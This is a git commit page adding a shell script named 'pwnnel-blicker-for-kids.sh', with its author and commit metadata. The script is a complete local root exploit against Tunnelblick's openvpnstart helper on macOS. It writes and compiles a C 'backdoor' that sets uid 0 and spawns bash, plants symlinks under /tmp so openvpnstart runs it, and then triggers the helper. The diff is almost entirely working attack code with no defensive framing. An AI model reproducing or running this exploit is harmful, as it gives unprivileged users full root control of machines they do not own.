An easy shell script.

author: Jason A. Donenfeld <Jason@zx2c4.com> 2012-08-11 17:00:56 +0200
committer: Jason A. Donenfeld <Jason@zx2c4.com> 2012-08-11 17:00:56 +0200
commit: 059cdebb2d51944881dd24e862f9e40b249ee0a6 (patch)
tree: aab2dad25534048cf8868377184e5e653fc52db2 /pwnnel-blicker-for-kids.sh
parent: What's the damn program called again? (diff)
download: Pwnnel-Blicker-059cdebb2d51944881dd24e862f9e40b249ee0a6.tar.xz
Pwnnel-Blicker-059cdebb2d51944881dd24e862f9e40b249ee0a6.zip
1 files changed, 28 insertions, 0 deletions
diff --git a/pwnnel-blicker-for-kids.sh b/pwnnel-blicker-for-kids.sh
new file mode 100755
index 0000000..bc1a336
--- /dev/null
+++ b/pwnnel-blicker-for-kids.sh
@@ -0,0 +1,28 @@
+#!/bin/sh
+echo "[+] Making vulnerable directory."
+mkdir -pv /tmp/pwn/openvpn/openvpn-0
+
+echo "[+] Preparing payload."
+cat > /tmp/pwn/backdoor.c <<_EOF
+#include <unistd.h>
+#include <sys/stat.h>
+#include <stdio.h>
+
+int main()
+{
+	printf("[+] Cleaning up.\n");
+	system("rm -rfv /tmp/pwn");
+	printf("[+] Getting root.\n");
+	setuid(0);
+	setgid(0);
+	execl("/bin/bash", "bash", NULL);
+}
+_EOF
+gcc -o /tmp/pwn/root /tmp/pwn/backdoor.c
+
+echo "[+] Creating symlinks."
+ln -s -v -f /tmp/pwn/root /tmp/pwn/openvpn/openvpn-0/openvpn
+ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start
+
+echo "[+] Triggering vulnerable program."
+exec /tmp/pwn/start OpenVPNInfo 0
author	Jason A. Donenfeld <Jason@zx2c4.com>	2012-08-11 17:00:56 +0200
committer	Jason A. Donenfeld <Jason@zx2c4.com>	2012-08-11 17:00:56 +0200
commit	059cdebb2d51944881dd24e862f9e40b249ee0a6 (patch)
tree	aab2dad25534048cf8868377184e5e653fc52db2 /pwnnel-blicker-for-kids.sh
parent	What's the damn program called again? (diff)
download	Pwnnel-Blicker-059cdebb2d51944881dd24e862f9e40b249ee0a6.tar.xz Pwnnel-Blicker-059cdebb2d51944881dd24e862f9e40b249ee0a6.zip